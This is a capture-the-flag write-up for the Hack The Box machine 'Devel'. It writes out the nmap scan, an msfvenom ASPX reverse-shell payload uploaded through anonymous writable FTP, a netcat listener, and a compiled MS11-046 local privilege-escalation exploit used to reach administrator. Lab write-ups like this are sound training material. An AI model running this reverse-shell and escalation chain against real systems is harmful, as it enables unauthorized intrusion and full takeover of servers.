Devel — HTB

IP :- 10.10.10.5

NMAP

nmap -v -A -sC -oN nmap 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 12-06-19  06:13PM                 1442 cmdasp.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-06-19  06:09PM                    6 test.txt
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

Nmap has also told that anonymous login allowed for ftp server

after visiting ftp we can see that we are have permission to write on ftp server

we see that there are some files at ftp , now let’s see is this directory is shared on web?

ftp files are accessible from web

Great, so it looks like we can upload files to the server. Let’s generate an ASPX reverse shell using msfvenom and upload that.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f aspx > shell.aspx

as the reverse shell is generated, let’s upload it.

ftp> put shell.aspx
local: shell.aspx remote: shell.aspx 
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.                              
1442 bytes sent in 0.00 secs (985.4465 kB/s)

We can now access this file via the browser.

as we had given LPORT 4444 in payload for reverse shell

start nc on port 4444 using

nc -lvp 4444

now it’s time to call our shell.apsx for getting shell

http://10.10.10.5/shell1.aspx  ( call from your browser )

now we get shell at our nc

we are just a iis user we are not having permission to visit on other users folders

so we have to do privilege escalation

we used systeminfo command for the system information

c:\Users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          25/2/2019, 12:29:12
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 754 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use:    527 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5 

we got OS Version :- 6.1.7600 n/a build 7600

let’s see if this version is vulnerable to privilege escalation

we got the exploit for exploitdb

we downloaded and compiled it from this is the command

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

and we got the compiled MS11–046.exe now the main work is to transfer it to victim machine for privilege escalation

remember we are having write permission to ftp again sending file with ftp

after this upload the shell.exe file to the machine. Use the FTP server in binary mode for the transfer.

ftp> binary
200 Type set to I.
ftp> put MS11–046.exe 
local: MS11–046.exe remote: MS11–046.exe
200 PORT command successful.

we now move to c:\inetpub\wwwroot and there we got our MS11–046

now we just had to run

now we are having administrator power

and we can visit to any users profile/directory

got root at

C:\Users\Administrator\Desktop\type root.txt.txt
e621a0b50************728bc72b4b

got user at

C:\Users\babis\Desktop\type user.txt.txt
9ecdd6a3a************ea70f4cb3e8

THANKYOU!!!!!!